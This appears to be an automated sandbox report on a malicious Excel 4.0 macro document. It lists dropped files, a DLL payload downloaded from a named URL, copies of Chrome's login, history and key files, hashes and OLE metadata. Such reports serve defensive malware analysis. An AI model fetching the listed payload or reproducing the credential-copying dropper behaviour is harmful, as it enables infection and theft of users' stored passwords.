                                              Preview: MSCF............,...................I........T........bR. .authroot.stl...s~.4..CK..8T....c_.d....A.K......&.-.J...."Y...$E.KB..D...D.....3.n..u.............|..=H4..c&.......f.,..=..-....p2.:..`HX......b.......Di.a......M.....4.....i..}..:~N.<..>.*.V..CX......B......,.q.M.....HB..E~Q...)..Gax../..}7..f......O0...x..k..ha...y.K.0.h..(....{2Y.].g...yw..|0.+?.`-../.xvy..e......w.+^...w|.Q.k.9&.Q.EzS.f......>?w.G.......v.F......A......-P.$.Y...u....Z..g..>.0&.y.(..<.].`>... ..R.q...g.Y..s.y.B..B....Z.4.<?.R....1.8.<.=.8..[a.s.......add..).NtX....r....R.&W4.5]....k.._iK..xzW.w.M.>,5.}..}.tLX5Ls3_..).!..X.~...%.B.....YS9m.,.....BV`.Cee.....?......:.x-.q9j...Yps..W...1.A<.X.O....7.ei..a\.~=X....HN.#....h,....y...\.br.8.y"k).....~B..v....GR.g|.z..+.D8.m..F .h...*.........ItNs.\....s..,.f`D...]..k...:9..lk.<D....u...........[...*.wY.O....P?.U.l....Fc.ObLq......Fvk..G9.8..!..\T:K`.......'.3......;.u..h...uD..^.bS...r........j..j .=...s .FxV....g.c.s..9.
                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):326
                                              Entropy (8bit):3.1208005371411627
                                              Encrypted:false
                                              SSDEEP:6:kKBOLywTJ0N+SkQlPlEGYRMY9z+4KlDA3RUe0ht:ZNwTJrkPlE99SNxAhUe0ht
                                              MD5:79B44DDA691327BDA128A6BCF94C491C
                                              SHA1:3BC241485CCFFA18F61AE47CB814B05E31D45DF3
                                              SHA-256:C465AF316711C90DC7588906C0BA938DFEB934C385D0C8B96546E9DF06840B77
                                              SHA-512:4BB430984B97291BFA701FA4A6F71A547D0B4503CEA454531725683BA922B3DA6207213281753ECFA50B74BD52255BEC4D433F467E2B6DD168DFEEA9D3823510
                                              Malicious:false
                                              Reputation:low
                                              Preview: p...... ...........3.@..(....................................................... ...................$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.d.8.f.4.f.3.f.6.f.d.7.1.:.0."...
                                              C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History.bak
                                              Process:C:\Windows\System32\cmd.exe
                                              File Type:SQLite 3.x database, last written using SQLite version 3032001
                                              Category:dropped
                                              Size (bytes):122880
                                              Entropy (8bit):0.4753649773590379
                                              Encrypted:false
                                              SSDEEP:48:T7Y5Bk9MtTeBk9SYxNPM5ETQTQYysX0Xu132RUS5PtsikKLwQTR8+z3QH3eMwVaY:gHYJYsU+QYysX0CcFWeTVaN+LrL25sjF
                                              MD5:AEE054CEBAB27FF921F10325627DBAF4
                                              SHA1:FCE2FB98C6FB7F4B59877909B314F948BF91B19D
                                              SHA-256:380980EA5623B2D84A074DDE44C164554E3D2CBA0149F73C55EDE2D7F0220AA5
                                              SHA-512:0E5DDFFAB24764F852945602331949E903F039F285F07364F6D4BB1D4E09645F7C4A1E2020D915006BEFE365E07867FBC19DFA4B01D20A03166055D56AE4EBE1
                                              Malicious:true
                                              Reputation:moderate, very likely benign file
                                              Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data.bak
                                              Process:C:\Windows\System32\cmd.exe
                                              File Type:SQLite 3.x database, last written using SQLite version 3032001
                                              Category:dropped
                                              Size (bytes):40960
                                              Entropy (8bit):0.7798653713156546
                                              Encrypted:false
                                              SSDEEP:48:L3k+YzHF/8LKBwUf9KfWfkMUEilGc7xBM6vu3f+fmyJqhU:LSe7mlcwilGc7Ha3f+u
                                              MD5:CD5ACB5FAA79EEB4CDB481C6939EEC15
                                              SHA1:527F3091889C553B87B6BC0180E903E2931CCCFE
                                              SHA-256:D86AE09AC801C92AF3F2A18515F0C6ACBFA162671A7925405590CA4959B51E96
                                              SHA-512:A79C4D7F592A9E8CC983878B02C0B89DECB77D71F9451C0A5AE3F1E898C42081693C350E0BE0BA52342D51D6A3E198E0E87340AC5E268921623B088113A70D5D
                                              Malicious:true
                                              Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data.bak
                                              Process:C:\Windows\System32\cmd.exe
                                              File Type:SQLite 3.x database, last written using SQLite version 3032001
                                              Category:dropped
                                              Size (bytes):77824
                                              Entropy (8bit):1.1340767975888557
                                              Encrypted:false
                                              SSDEEP:96:rSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+H:OG8mZMDTJQb3OCaM0f6k81Vumi
                                              MD5:9A38AC1D3304A8EEFD9C54D4EADCCCD6
                                              SHA1:56E953B2827B37491BC80E3BFDBBF535F95EDFA7
                                              SHA-256:67960A6297477E9F2354B384ECFE698BEB2C1FA1F9168BEAC08D2E270CE3558C
                                              SHA-512:32281388C0DE6AA73FCFF0224450E45AE5FB970F5BA3E72DA1DE4E39F80BFC6FE1E27AAECC6C08165D2BF625DF57F3EE3FC1115BF1F4BA6DDE0EB4F69CD0C77D
                                              Malicious:true
                                              Preview: SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State.bak
                                              Process:C:\Windows\System32\cmd.exe
                                              File Type:ASCII text, with very long lines, with no line terminators
                                              Category:dropped
                                              Size (bytes):35549
                                              Entropy (8bit):6.06431092799383
                                              Encrypted:false
                                              SSDEEP:768:2F3tAP0WdZWTHzO+EMvDBdIu++qtXQQJokdugILQ67IU4I9zrLWJ:k3O8Ni+RvDD5/qNQmduDKRIFrLWJ
                                              MD5:4E06FDEE66DA477D15AAAFD104802FF3
                                              SHA1:2814763828D036134EEF93F28D6C499913E903AA
                                              SHA-256:835ADDCE810330CA6D1FE5AA598CB758B639173086517BEBC6B0AAC7CBFDAA1D
                                              SHA-512:42521F28CAD2FEA206592962A999202FA65E4A398EF29B9A759DAFFAD60CA95E027ABB52E523C799E7C131A15B17CDFC46FEC102C48EF7569D381C6E47680F37
                                              Malicious:false
                                              Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"84.0.4147.89"},"easy_unlock":{"device_id":"f691bb0f-1b4f-4339-aef5-321b65f13447"},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.595529173769173e+12,"network":1.595503998e+12,"ticks":494811744.0,"uncertainty":4224807.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAADCJQEpL4peQLs/tCx05ts1AAAAAAIAAAAAABBmAAAAAQAAIAAAAHMdBSm688AB9E4ujGBlc8b12w9pH8Ho0MG5KX0s9TvsAAAAAA6AAAAAAgAAIAAAAKp70FMSZVCDUsFN1iNo5k0cdS+uI3XobvqN11pz11FbMAAAAHEgEYBv3dbmfqLRp8KY9FTYBCEdPLIJnBuQSIy6PW6ieb+TQlX0tlf+joBO06Pyo0AAAADT82DjaNvFLY7T0RywXTGepumesXXBFeM5MLg7ZlErGegSazITBqJVemjLdeT3R2c6H7dl+tlEXxt1m8SJWLUl"},"policy":{"last_statistics_update":"13240002771769952"},"profile":{"info_cache":{"Default":{"active_time":1595529172.199256,"avatar_icon":"chrome://theme/IDR_PROFILE_AVATAR_26","background_apps":false,"
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\netmouser[1].dll
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:PE32 executable (DLL) (native) Intel 80386, for MS Windows
                                              Category:downloaded
                                              Size (bytes):443904
                                              Entropy (8bit):5.48997157707661
                                              Encrypted:false
                                              SSDEEP:12288:mLseU1D6L/hAsEYhbdf6YMvkm2kJYcxpGJ1:mLlS6L/G2f6jv7dJYYpGJ1
                                              MD5:EB70B6C24C0466954169882DBE5729A4
                                              SHA1:B81BCD8273854EFB7D7B3FB5B982D75051A5D9A6
                                              SHA-256:C6F319A3EDA16BEF437421920E2945AB4B3101CB27AD2F291C3DACDF84BB2240
                                              SHA-512:E90C5C958024734F089205E43F2C9A842E4FC68B8A7FCC7FC10754511A8B6BB724EAB563BDD5141F9A1BE634A3194F5B3ABD14F97CDD0735C42F501D8F63E59F
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 32%
                                              IE Cache URL:https://deluciaspizza.com/netmouser.dll
                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........{...............x.......................|.......|......Rich....................PE..L....`...........!.........................0......................................J.....@.............................D.......<...................................`................................................0..0............................text...o........................... ..`.rdata...b...0...d..................@..@.data....@.......B..................@....reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                              C:\Users\user\AppData\Local\Temp\83EE0000
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):86480
                                              Entropy (8bit):7.890505987257101
                                              Encrypted:false
                                              SSDEEP:1536:7rgJ/8MbJmdYp5AeWvic8kcpLVEWgWGHKlMVGoIahaDHTU6hryF705w/K:7rgp8MbJgQAibEWgW2K2sTU2yF704K
                                              MD5:2107602F6F3992BCEC69933AF1782C13
                                              SHA1:2F013C6B34182B7ABB63A8E10046906BBDB08642
                                              SHA-256:083BD42C47B82BA299AE4D5A4FD0A78A05B4EA364346DA1204FA76DC632D3A81
                                              SHA-512:DD592C6777B0F80BE2E0856BD645CF96003E0B8BF8E1B4850951B790C824F3E0E6E67FBB48993A142F6E0B1010B4AC9B81D1D5A88BBD2F13A11220B3646D0EA7
                                              Malicious:false
                                              Preview: .U.N.0.}..?D~E..*UU.Y..<.R...{...7.....q6.X.M"..K...9sf...E.U..>HkJrV,H..[!.$..n.$.....5P.-.r.:..|.:...M(I...Ei.5h.....Ne.f....:.7l..|..A.5.L.c. ...T.I....]$.Iv.;..J"u.u:..].".<..c<...b.).Y.|.g#......PK.N..'.i..........x.4..../.o.....IR.:..pPE..b.....G...y...R...}.M..X..V.. ,..X."8.L.dZ..I.=3....G.....k.....v.....G..>!..e."wf....K....m._..-.H.C.*..r:..tL.f....].=...#q..^R....z.;..].......9.=.!}.u........^'IB....G..,..."...{.... ..i;.W........PK..........!...i.............[Content_Types].xml ...(...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              C:\Users\user\AppData\Local\Temp\CabEB4A.tmp
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:Microsoft Cabinet archive data, 58596 bytes, 1 file
                                              Category:dropped
                                              Size (bytes):58596
                                              Entropy (8bit):7.995478615012125
                                              Encrypted:true
                                              SSDEEP:1536:J7r25qSSheImS2zyCvg3nB/QPsBbgwYkGrLMQ:F2qSSwIm1m/QEBbgb1oQ
                                              MD5:61A03D15CF62612F50B74867090DBE79
                                              SHA1:15228F34067B4B107E917BEBAF17CC7C3C1280A8
                                              SHA-256:F9E23DC21553DAA34C6EB778CD262831E466CE794F4BEA48150E8D70D3E6AF6D
                                              SHA-512:5FECE89CCBBF994E4F1E3EF89A502F25A72F359D445C034682758D26F01D9F3AA20A43010B9A87F2687DA7BA201476922AA46D4906D442D56EB59B2B881259D3
                                              Malicious:false
                                              Preview: MSCF............,...................I........T........bR. .authroot.stl...s~.4..CK..8T....c_.d....A.K......&.-.J...."Y...$E.KB..D...D.....3.n..u.............|..=H4..c&.......f.,..=..-....p2.:..`HX......b.......Di.a......M.....4.....i..}..:~N.<..>.*.V..CX......B......,.q.M.....HB..E~Q...)..Gax../..}7..f......O0...x..k..ha...y.K.0.h..(....{2Y.].g...yw..|0.+?.`-../.xvy..e......w.+^...w|.Q.k.9&.Q.EzS.f......>?w.G.......v.F......A......-P.$.Y...u....Z..g..>.0&.y.(..<.].`>... ..R.q...g.Y..s.y.B..B....Z.4.<?.R....1.8.<.=.8..[a.s.......add..).NtX....r....R.&W4.5]....k.._iK..xzW.w.M.>,5.}..}.tLX5Ls3_..).!..X.~...%.B.....YS9m.,.....BV`.Cee.....?......:.x-.q9j...Yps..W...1.A<.X.O....7.ei..a\.~=X....HN.#....h,....y...\.br.8.y"k).....~B..v....GR.g|.z..+.D8.m..F .h...*.........ItNs.\....s..,.f`D...]..k...:9..lk.<D....u...........[...*.wY.O....P?.U.l....Fc.ObLq......Fvk..G9.8..!..\T:K`.......'.3......;.u..h...uD..^.bS...r........j..j .=...s .FxV....g.c.s..9.
                                              C:\Users\user\AppData\Local\Temp\TarEB4B.tmp
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):152788
                                              Entropy (8bit):6.309740459389463
                                              Encrypted:false
                                              SSDEEP:1536:TIz6c7xcjgCyrYBZ5pimp4Ydm6Caku2Dnsz0JD8reJgMnl3rlMGGv:TNqccCymfdmoku2DMykMnNGG0
                                              MD5:4E0487E929ADBBA279FD752E7FB9A5C4
                                              SHA1:2497E03F42D2CBB4F4989E87E541B5BB27643536
                                              SHA-256:AE781E4F9625949F7B8A9445B8901958ADECE7E3B95AF344E2FCB24FE989EEB7
                                              SHA-512:787CBC262570A4FA23FD9C2BA6DA7B0D17609C67C3FD568246F9BEF2A138FA4EBCE2D76D7FD06C3C342B11D6D9BCD875D88C3DC450AE41441B6085B2E5D48C5A
                                              Malicious:false
                                              Preview: 0..T...*.H.........T.0..T....1.0...`.H.e......0..D...+.....7.....D.0..D.0...+.....7..........|h....210303062855Z0...+......0..D.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Tue May 4 12:48:43 2021, atime=Tue May 4 12:48:43 2021, length=8192, window=hide
                                              Category:dropped
                                              Size (bytes):867
                                              Entropy (8bit):4.483899325813242
                                              Encrypted:false
                                              SSDEEP:12:85QfLgXg/XAlCPCHaXtB8XzB/2TX+WnicvbbbDtZ3YilMMEpxRljKzTdJP9TdJPe:85I/XTd6j0YejDv3q+rNru/
                                              MD5:C1DA831FF8C1D36AE69AD9648E49CF28
                                              SHA1:E1AB2CB44E2BFE52BBA52912CC34EBA39272E1D2
                                              SHA-256:086B9F8767675BC5FF71428A932AE7504CB6286E737572D0263205B15AF9192F
                                              SHA-512:F2A352B3C3B96A6AD1DB00DC0AB0204EFD79FC251369F2180878189905C4D88510CC8F49CAB2C64A1A4C356A4B36C26125380B68F29010CA17F7F8D69F52F980
                                              Malicious:false
                                              Preview: L..................F...........7G...].2.@...].2.@... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......R.n..Desktop.d......QK.X.R.n*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\035347\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......035347..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\SecuriteInfo.com.Heur.31681.LNK
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue May 4 12:48:28 2021, mtime=Tue May 4 12:48:43 2021, atime=Tue May 4 12:48:43 2021, length=111104, window=hide
                                              Category:dropped
                                              Size (bytes):2198
                                              Entropy (8bit):4.568985214379028
                                              Encrypted:false
                                              SSDEEP:48:8L/XT0jZJHhv7WDHhvW+Qh2L/XT0jZJHhv7WDHhvW+Q/:8L/XojZJZ4W+Qh2L/XojZJZ4W+Q/
                                              MD5:250A7D92FD78751441072A24FBA1B2AF
                                              SHA1:1D1DF5D3BB1D8982F6F4FFD67502C14D34E5432F
                                              SHA-256:E7636903BB5571D9B3771BB00881ECF078D5A773B95790C1DC0C795FFE0ED39D
                                              SHA-512:DB8BC6235287D12FBFC4ADB86FED6D94C4420D24BE01FDB86CA6DAF1E15D85BA46F0E1C4F26D883825C319E4A6E74CE1154FE174F54F0519758FE23AA20B2D8C
                                              Malicious:false
                                              Preview: L..................F.... ....^`).@...].2.@...D.2.@...............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......R.n..Desktop.d......QK.X.R.n*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2..b...R.n .SECURI~1.XLS..l......R.n.R.n*.........................S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...H.e.u.r...3.1.6.8.1...x.l.s.......................-...8...[............?J......C:\Users\..#...................\\035347\Users.user\Desktop\SecuriteInfo.com.Heur.31681.xls.6.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...H.e.u.r...3.1.6.8.1...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`
                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):134
                                              Entropy (8bit):4.809828785316944
                                              Encrypted:false
                                              SSDEEP:3:oyBVomM0bhUpXCuscbhUpXCmM0bhUpXCv:dj60lgX7lgXU0lgXs
                                              MD5:C58F93CF376E5D4BD44FAE4A9737CB5F
                                              SHA1:6512FC58013828CAA0B38A16AB94962E964CC133
                                              SHA-256:9167F4CA112D0ACAD8BB834E1AB16188D3E877DDFA98AC25E23EC80A2F7B7154
                                              SHA-512:090DA965C5E3679616ED6D56D311627434A4A27D3B2B21AF161290A016FBB2C5A5AB5AEF730DB80D25421F47B63E25DD1A04D4425EC6D7AE05BE6196E8644EE9
                                              Malicious:false
                                              Preview: Desktop.LNK=0..[xls]..SecuriteInfo.com.Heur.31681.LNK=0..SecuriteInfo.com.Heur.31681.LNK=0..[xls]..SecuriteInfo.com.Heur.31681.LNK=0..
                                              C:\Users\user\Desktop\54EE0000
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:Applesoft BASIC program data, first line number 16
                                              Category:dropped
                                              Size (bytes):160460
                                              Entropy (8bit):6.668627641571013
                                              Encrypted:false
                                              SSDEEP:3072:X98rmjAItyzElBIL6lECbgBGGP5xLmuCSK2nTUSyF70piJW2Iqp087XTBQIqpYTh:N8rmjAItyzElBIL6lECbgBvP5NmuCSV4
                                              MD5:DE0A95531476C137D89DD37F7117A28C
                                              SHA1:B862DE4DCD843F0D5F44C7F22588CFBEAF4899A0
                                              SHA-256:B689C1ED4548E6FC9D9E4C7FF05540A8A02DA1DA8F70E2D7E2F2A433C29A19F0
                                              SHA-512:35E2B589ACB808DF393315C42726DDF31955A9D24CA4629FC1C64A48D338A39AB81FB0DD79040C2C311D5169F95E067FD41F11325DFAA1C3A1CE52584BAA238F
                                              Malicious:false
                                              Preview: ........g2..........................\.p....user B.....a.........=...................................................=.....i..9J.8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...@...8...........C.a.l.i.b.r.i.1...@...............C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...,...8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1...h...8...........C.a.m.b.r.i.a.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......
                                              C:\Users\user\fndskfnds.dfm
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:PE32 executable (DLL) (native) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):443904
                                              Entropy (8bit):5.48997157707661
                                              Encrypted:false
                                              SSDEEP:12288:mLseU1D6L/hAsEYhbdf6YMvkm2kJYcxpGJ1:mLlS6L/G2f6jv7dJYYpGJ1
                                              MD5:EB70B6C24C0466954169882DBE5729A4
                                              SHA1:B81BCD8273854EFB7D7B3FB5B982D75051A5D9A6
                                              SHA-256:C6F319A3EDA16BEF437421920E2945AB4B3101CB27AD2F291C3DACDF84BB2240
                                              SHA-512:E90C5C958024734F089205E43F2C9A842E4FC68B8A7FCC7FC10754511A8B6BB724EAB563BDD5141F9A1BE634A3194F5B3ABD14F97CDD0735C42F501D8F63E59F
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 32%
                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........{...............x.......................|.......|......Rich....................PE..L....`...........!.........................0......................................J.....@.............................D.......<...................................`................................................0..0............................text...o........................... ..`.rdata...b...0...d..................@..@.data....@.......B..................@....reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                              C:\Windows\System32\cn\aexsxmcq.txt
                                              Process:C:\Windows\System32\wermgr.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):608
                                              Entropy (8bit):7.638638988677332
                                              Encrypted:false
                                              SSDEEP:12:oONov6LjBVTKblxWVAuVWttQNEmeibOK517U6lblZm3hsH9O+7thR:voSLTTKbs3WttQNE5dg1Qky36dOI/R
                                              MD5:AB4E12A390F55FE62FBD75F6ADDB4119
                                              SHA1:6F0E035EC4C30DA12391DC4B399150D9E81AB14F
                                              SHA-256:7859D3EAD3793DFCA50DA95C8BFFE076072AECB63C337B6CC6A502ECAAE7B681
                                              SHA-512:B7C568CACA56E91D6B4FFB3B7C6DAC0415450237B52C14D2FF269139EB01330F98245500A490ACB83F5D125F30382E09F35CBA0AF0CC022D2D67B87CE33193D4
                                              Malicious:false
                                              Preview: ......;.R.....R{...h..VC..I.@5.#.]..5y{...T..{Jl.M.....p._..M.'... m|.X.Y.k.........XK..Y.paI.6.........^..P.....|...K..n....>Ru.}......=...KV..<..<.M*7.......z...i.m...Y...8t.i?....]d...T..F......GsY......NG.o..c.!..t..[.X...0iq;M.p.....@nMt....F+D.~Dx...=...]Q .o..n.O.v`ktxk...~u.I....q.}.'...6h..]W..7....}.R.F.'.w.....h|....._....G.."S.*.y.P,q...;........m.....4...O.D.r.......[...*......*i...:C..s..O..!R|...r..KEV.)...r.^^4..=.....N....d_...@im.^.>...T@O..N...Ip..K.x.ea._2...|.u.E.O-"......N.M..l.qr.]DQ....b.3d......:x*%_......[T5.OgP..#...... <....Gg...p...>\Lqnq..|(A..

                                              Static File Info

                                              General

                                              File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Last Saved By: 5, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon May 3 13:21:14 2021, Security: 0
                                              Entropy (8bit):3.255029905486473
                                              TrID:
                                              • Microsoft Excel sheet (30009/1) 78.94%
                                              • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                              File name:SecuriteInfo.com.Heur.31681.xls
                                              File size:287232
                                              MD5:6f7f78fa1fbe9be8fbe20812658c43aa
                                              SHA1:d3f78f528a797c2e97af9f25e189bc43d98f2eae
                                              SHA256:4d05d391297e3c4ec1bc4047bd3e104f37123c709797854053966ced43f492fb
                                              SHA512:133b86d12ad499a3a84d87b0d631dc293a74c368e1a66f2b2d47a91127f94a00a2d63829dc149022c4ea405ea3738b19bf886c054c43cfe17f29c903eb0ba49d
                                              SSDEEP:6144:6cPiTQAVW/89BQnmlcGvgZ7rDjo8UOMzJK+tfq5I:5pO
                                              File Content Preview:........................>......................./...........................*...+...,...-......................................................................................................................................................................

                                              File Icon

                                              Icon Hash:e4eea286a4b4bcb4

                                              Static OLE Info

                                              General

                                              Document Type:OLE
                                              Number of OLE Files:1

                                              OLE File "SecuriteInfo.com.Heur.31681.xls"

                                              Indicators

                                              Has Summary Info:True
                                              Application Name:Microsoft Excel
                                              Encrypted Document:False
                                              Contains Word Document Stream:False
                                              Contains Workbook/Book Stream:True
                                              Contains PowerPoint Document Stream:False
                                              Contains Visio Document Stream:False
                                              Contains ObjectPool Stream:
                                              Flash Objects Count:
                                              Contains VBA Macros:True

                                              Summary

                                              Code Page:1251
                                              Last Saved By:5
                                              Create Time:2006-09-16 00:00:00
                                              Last Saved Time:2021-05-03 12:21:14
                                              Creating Application:Microsoft Excel
                                              Security:0

                                              Document Summary

                                              Document Code Page:1251
                                              Thumbnail Scaling Desired:False
                                              Contains Dirty Links:False

                                              Streams

                                              Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                              General
                                              Stream Path:\x5DocumentSummaryInformation
                                              File Type:data
                                              Stream Size:4096
                                              Entropy:0.338488976625
                                              Base64 Encoded:False
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t . . . . . S h e e t 1 . . . . . S h e e t 5 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . S h e e t 4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E x c e l 4 . 0 . . . . . . . .
                                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 d4 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 0b 00 00 00 38 00 00 00 10 00 00 00 40 00 00 00 0d 00 00 00 48 00 00 00 0c 00 00 00 91 00 00 00 02 00 00 00 e3 04 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 1e 10 00 00 06 00 00 00
                                              Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                              General
                                              Stream Path:\x5SummaryInformation
                                              File Type:data
                                              Stream Size:4096
                                              Entropy:0.244614774606
                                              Base64 Encoded:False
